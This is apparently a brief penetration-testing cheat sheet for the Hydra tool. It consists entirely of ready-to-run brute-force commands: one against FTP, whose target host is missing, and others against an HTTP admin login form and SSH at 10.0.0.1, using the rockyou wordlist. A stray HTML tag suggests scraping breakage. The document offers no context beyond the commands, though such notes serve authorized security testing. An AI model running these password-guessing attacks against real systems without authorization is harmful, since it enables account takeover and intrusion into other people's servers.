Internal Infrastructure Pentest - Hydra

less than 1 minute read

root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV  ftp
</pre>

- Bruteforcing through Hydra:
  - hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin

  - hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://10.0.0.1